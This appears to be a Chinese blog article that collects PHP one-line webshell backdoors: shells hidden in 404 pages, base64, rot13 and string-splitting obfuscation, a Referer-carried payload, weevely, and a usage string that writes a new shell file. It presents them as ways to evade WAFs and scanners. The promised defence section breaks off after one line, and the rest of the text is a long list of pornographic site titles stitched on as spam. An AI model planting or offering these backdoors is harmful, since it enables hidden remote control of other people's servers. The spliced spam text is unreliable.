我們以一個(gè)學(xué)習(xí)的心態(tài)來(lái)對(duì)待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。
強(qiáng)悍的PHP一句話后門
這類后門讓網(wǎng)站、服務(wù)器管理員很是頭疼,經(jīng)常要換著方法進(jìn)行各種檢測(cè),而很多新出現(xiàn)的編寫技術(shù),用普通的檢測(cè)方法是沒法發(fā)現(xiàn)并處理的。今天我們細(xì)數(shù)一些有意思的PHP一句話木馬。
利用404頁(yè)面隱藏PHP小馬:
Not Found
The requested URL was not found on this server.
<?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>
404頁(yè)面是網(wǎng)站常用的文件,一般建議好后很少有人會(huì)去對(duì)它進(jìn)行檢查修改,這時(shí)我們可以利用這一點(diǎn)進(jìn)行隱藏后門。
無(wú)特征隱藏PHP一句話:
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('/'a/'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[/'theCode/']))','a');
將$_POST['code']的內(nèi)容賦值給$_SESSION['theCode'],然后執(zhí)行$_SESSION['theCode'],亮點(diǎn)是沒有特征碼。用掃描工具來(lái)檢查代碼的話,是不會(huì)報(bào)警的,達(dá)到目的了。
超級(jí)隱蔽的PHP后門:
<?php $_GET[a]($_GET[b]);?>
僅用GET函數(shù)就構(gòu)成了木馬;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
執(zhí)行后當(dāng)前目錄生成c.php一句話木馬,當(dāng)傳參a為eval時(shí)會(huì)報(bào)錯(cuò)木馬生成失敗,為assert時(shí)同樣報(bào)錯(cuò),但會(huì)生成木馬,真可謂不可小視,簡(jiǎn)簡(jiǎn)單單的一句話,被延伸到這般應(yīng)用。
層級(jí)請(qǐng)求,編碼運(yùn)行PHP后門:
此方法用兩個(gè)文件實(shí)現(xiàn),文件1
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
文件2
<?php//2.phpheader('Content-type:text/html;charset=utf-8');//要執(zhí)行的代碼$code = << $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);
通過HTTP請(qǐng)求中的HTTP_REFERER來(lái)運(yùn)行經(jīng)過base64編碼的代碼,來(lái)達(dá)到后門的效果,一般waf對(duì)referer這些檢測(cè)要松一點(diǎn),或者沒有檢測(cè)。用這個(gè)思路bypass waf不錯(cuò)。
PHP后門生成工具weevely
weevely是一款針對(duì)PHP的webshell的自由軟件,可用于模擬一個(gè)類似于telnet的連接shell,weevely通常用于web程序的漏洞利用,隱藏后門或者使用類似telnet的方式來(lái)代替web 頁(yè)面式的管理,weevely生成的服務(wù)器端php代碼是經(jīng)過了base64編碼的,所以可以騙過主流的殺毒軟件和IDS,上傳服務(wù)器端代碼后通??梢酝ㄟ^weevely直接運(yùn)行。
weevely所生成的PHP后門所使用的方法是現(xiàn)在比較主流的base64加密結(jié)合字符串變形技術(shù),后門中所使用的函數(shù)均是常用的字符串處理函數(shù),被作為檢查規(guī)則的eval,system等函數(shù)都不會(huì)直接出現(xiàn)在代碼中,從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進(jìn)行掃描,結(jié)果顯示該文件無(wú)任何威脅。
以上是大概介紹下邊是截圖,相關(guān)使用方法亦家就不在這介紹了,簡(jiǎn)單的科普一下。

三個(gè)變形的一句話PHP木馬
第一個(gè)
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里寫http://site/1.php?2=assert密碼是1
第二個(gè)
<?php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。如果你用菜刀的附加數(shù)據(jù)的話更隱蔽,或者用其它注射工具也可以,因?yàn)槭莗ost提交的。
第三個(gè)
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即編碼后的eval,完全避開了關(guān)鍵字,又不失效果,讓人吐血!
最后列幾個(gè)高級(jí)的PHP一句話木馬后門:
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險(xiǎn)的include函數(shù),直接編譯任何文件為php格式運(yùn)行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險(xiǎn)的include函數(shù),直接編譯任何文件為php格式運(yùn)行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程序后門代碼
<?php eval_r($_POST[sb])?>
程序代碼
<?php @eval_r($_POST[sb])?>
//容錯(cuò)代碼
程序代碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執(zhí)行相關(guān)的php語(yǔ)句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個(gè)后,使用菜刀一句話客戶端在配置連接的時(shí)候在"配置"一欄輸入
程序代碼
h=@eval_r($_POST1);
程序代碼
//繞過<?限制的一句話
綜上,這些PHP一句話后門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點(diǎn)就在下邊的總結(jié)!
如何應(yīng)對(duì)PHP一句話后門:
我們強(qiáng)調(diào)幾個(gè)關(guān)鍵點(diǎn),看這文章的你相信不是門外漢,我也就不
国产日本亚洲高清|
精品人妻一区二区色欲产成人|
美国一区二区三区在线播放|
国产精品午夜一区二区|
欧美精品中文字幕亚洲专区|
欧美一区二区三区四区在线观看|
九九久久久久久|
91美女片黄在线观看91美女|
成人情趣片在线观看免费|
国产精品午夜久久|
亚洲第一网站男人都懂|
亚洲无线码在线一区观看|
久久久久北条麻妃免费看|
日韩一级毛片|
国产熟妇搡bbbb搡bbbb|
亚洲电影在线播放|
成人做爰www免费看视频网站|
老师让我她我爽了好久视频|
日韩精品系列|
国产一区二区三区色淫影院|
国产免费视频一区二区三区|
av福利网址网站|
成人疯狂猛交xxx|
国产精品一区二区三区美女|
成人3d动漫一区二区三区91|
国产女人高潮的av毛片|
性一交一乱一色一免费无遮挡|
日韩成人高清|
亚洲影视九九影院在线观看|
精品中文av资源站在线观看|
久久婷婷五月综合色国产香蕉|
国产伦精品一区二区三区四区免费|
精品国产_亚洲人成在线|
一区二区在线电影|
天天干天天摸天天操|
亚洲欧洲av另类|
av一区和二区|
先锋影音国产精品|
中文字幕欧美日韩一区|
国产在线看片|
国产亚洲自拍偷拍|
影音先锋男人在线|
国产精品视频一区二区图片|
999精品在线|
国产厕拍一区|
xxxx另类黑人|
久草热8精品视频在线观看|
亚洲一区二区动漫|
国产网址在线观看|
国产精品热久久久久夜色精品三区|
四虎影在永久在线观看|
一本一本久久a久久精品综合麻豆|
91视视频在线直接观看在线看网页在线看|
国产视频手机在线观看|
欧洲成人一区二区|
国产高清一区二区三区视频|
黄色的视频在线免费观看|
2023国产在线观看|
91传媒视频在线播放|
91九色综合|
www成人免费观看|
瑟瑟视频在线观看|
九色蝌蚪自拍|
欧美日韩国产成人在线观看|
久久精品日产第一区二区|
免费看av在线|
欧美一区二区激情|
亚洲欧美日韩精品久久奇米色影视|
欧美第一黄网免费网站|
国产美女91呻吟求|
久久亚洲精品成人|
久久成人免费视频|
国产精品男人的天堂|
欧美午夜影院|
狂野欧美激情性xxxx|
国产模特精品视频久久久久|
2019中文字幕在线|
久久黄色小视频|
亚洲第一第二区|
伊人成人开心激情综合网|
亚洲免费视频在线观看|
欧美国产日本在线|
永久www成人看片|
久久久国产精品一区二区中文|
国内在线观看一区二区三区|
97精品国产91久久久久久|
青青青免费视频在线2|
午夜视频免费在线观看|
成人午夜无人区一区二区|
99精品一区二区三区的区别|
114国产精品久久免费观看|
久久亚洲精精品中文字幕早川悠里|
欧美日韩在线视频免费播放|
久久国产精品高清|
成人欧美色图|
日韩免费在线免费观看|
国产一区自拍视频|
亚洲精品乱码电影在线观看|
91香蕉视频导航|
国产精品999|
日韩精品影视|
我的公把我弄高潮了视频|
夜夜爽久久精品91|
久久夜靖品2区|
国产一区 二区 三区一级|
亚洲中文字幕在线观看|
欧美日韩黄色影视|
日韩精品―中文字幕|
韩国中文字幕2020精品|
日韩欧美精品电影|
久久99精品久久久久婷婷|
美女在线观看视频一区二区|
国产精品97在线|
日韩一卡二卡三卡四卡|
久久国产精品99久久久久久老狼|
18岁视频在线观看|
日韩成人在线看|
欧美成人午夜视频|
秋霞毛片久久久久久久久|
2024最新电影免费在线观看|
久久激情五月丁香伊人|
美女av免费看|
北岛玲日韩精品一区二区三区|
日韩黄色三级|
成人毛片视频免费看|
久操视频在线观看免费|
乱h高h女3p含苞待放|
91成人精品网站|
亚洲精蜜桃久在线|
超碰在线一区二区三区|
在线黄色免费网站|
中文字幕の友人北条麻妃|
日本精品一区二区三区高清|
久久精品精品电影网|
天堂av在线|
日韩在线网址|
久久av中文字幕|
久久av色综合|
国产日韩精品一区二区|
欧美高清你懂的|
欧美最猛黑人xxxxwww|
一本色道久久88|
av亚洲产国偷v产偷v自拍|
久久久久无码国产精品不卡|
美女脱光衣服与内衣内裤一区二区三区四区|
久久久噜噜噜www成人网|
日本综合视频|
国产成人澳门|
中文字幕在线亚洲三区|
亚洲av无码国产精品麻豆天美|
亚洲欧洲在线观看|
亚洲经典一区二区|
精品一区二区6|
国产精品一区二区6|
四虎影视最新地址|
成人av免费在线观看|
欧美福利视频一区二区|
在线观看国产中文字幕|
欧美日韩尤物久久|
国产成人免费av在线|
一区二区三区四区日韩|
久久奇米777|
91网页在线看|
亚洲国产综合91精品麻豆|
成人免费看片39|
国产一区二区三区久久悠悠色av|
欧美系列在线观看|
狂野欧美性猛交xxxx乱大交|
日韩中文字幕网址|
欧美.www|
亚洲精品欧美二区三区中文字幕|
久久久久久久久丰满|
视频一区免费观看|
国产精品.xx视频.xxtv|
影音先锋国产资源|
国产欧美一区二区三区视频|
最新国产在线精品91尤物|
美女视频网站久久|
久久久久人妻精品一区三寸|
亚洲成av人影院|
亚洲欧美日韩综合网|
99国产精品久久久久久久久久|
中日韩美女免费视频网址在线观看|
91精品视频专区|
久久久性生活视频|
欧美激情精品久久久久久免费印度|
亚洲网中文字幕|
在线观看精品视频看看播放|
日韩精品一区二区三区丰满|
性欧美疯狂xxxxbbbb|
肉色欧美久久久久久久免费看|
免费看污片网站|
国产精品r级在线|
成人18网站|
av不卡在线免费观看|
色天使综合视频|
精品久久免费|
激情校园亚洲图片|
色图欧美色图|
91 在线视频观看|
国产精品亚洲色图|
嫩草影院一区二区|
亚洲免费成人在线|
91在线看黄|
在线观看黄色av网站|
激情综合五月网|
国产欧美一区二区视频|
成人做爰免费视频免费看|
中文字幕在线看片|
亚洲大片免费观看|
成人免费毛片app|
欧美国产禁国产网站cc|
久久免费在线观看|
亚洲一区二区在线视频观看|
99久久夜色精品国产亚洲1000部|
国产喷白浆一区二区三区|
日韩精品第一区|
国产精彩视频在线|
日韩私人影院|
久久精品视频9|
av在线不卡免费看|
99久久99热这里只有精品|
国产成人av一区二区三区在线观看|
天天综合天天做天天综合|
性色av一区|
欧美黑人一级爽快片淫片高清|
欧美性感一类影片在线播放|
日韩精品手机在线|
色天天综合色天天久久|
欧美巨大xxxx做受沙滩|
日日碰狠狠添天天爽超碰97|
日韩亚洲国产中文字幕欧美|
国产美女直播视频一区|
日韩三级av在线|
国产精品亚洲无码|
www浪潮av99com|
91狠狠综合久久久久久|
一区二区三区免费在线观看视频|
韩国在线视频一区|
国产成人综合在线观看|
日本xxxxxxx免费视频|
岛国视频免费在线观看|
国产成人三级视频|
国产丝袜视频一区|
污污视频在线免费|
午夜电影网一区|
国产一级片在线|
国产资源在线免费观看|
羞羞视频在线观看欧美|
91精品在线免费|
人妻激情另类乱人伦人妻|
国产成人精品一区二区在线|
国产精品分类|
天堂久久一区二区三区|
色网综合在线观看|
成人在线网站|
中文在线网在线中文|
国产人妻人伦精品1国产丝袜|
日韩一区二区在线视频|
污香蕉视频在线观看|
午夜精品久久|
美女网站色精品尤物极品姐弟|
一区二区国产日产|
在线麻豆国产传媒1国产免费|
丁香五精品蜜臀久久久久99网站|
五月开心播播网|
美女精品国产|
精品在线播放|
一区二区三区日韩在线|
在线观看亚洲精品福利片|
久久精品一本|
91高清视频在线免费观看|
在线播放亚洲激情|
超碰96在线|
国产日产一区|
再深点灬舒服灬太大了添少妇视频|
亚洲国产日韩综合久久精品|
亚洲色图欧美制服丝袜另类第一页|
亚洲一区二区三区高清不卡|
欧美色偷偷大香|
亚洲欧美日韩图片|
视频在线观看免费影院欧美meiju|
一区二区三区性视频|
波多野结衣家庭教师在线观看|
精品视频一区二区三区在线观看|
日本国产欧美一区二区三区|
欧美videossex另类|
www.久久精品.com|
日韩有码在线播放|
精品一区二区三区电影|
亚洲精品wwww|
久久密一区二区三区|
国产综合av在线|
欧美成aaa人片在线观看蜜臀|
国产一区二区三区欧美|
高h视频免费观看|
三上悠亚国产精品一区二区三区|
99999色|
亚洲激情一区二区三区|
成视频在线免费观看|
国内精品久久久久久影院老狼|
91激情在线观看|
黑人巨大精品欧美一区二区|
a级片一区二区|
影音先锋日韩资源|
丰满放荡岳乱妇91ww|
五十路熟女丰满大屁股|
亚洲少妇激情视频|
国产一区二区精品久久91|
久99久视频|
麻豆久久久9性大片|
日韩美女视频免费在线观看|
91网站免费入口|
99国产精品久久久|
国产成人av免费看|
尤物视频在线观看网站|
青青视频在线播放|
日本美女高清在线观看免费|
久久久国产精品一区二区三区|
亚洲不卡一卡2卡三卡4卡5卡精品|
日本jizzcom|
色av中文字幕一区|
久久九九影视网|
国产高清精品软男同|
国产二级一片内射视频播放|
高清一区二区中文字幕|
欧美久久久影院|
久久久精品免费网站|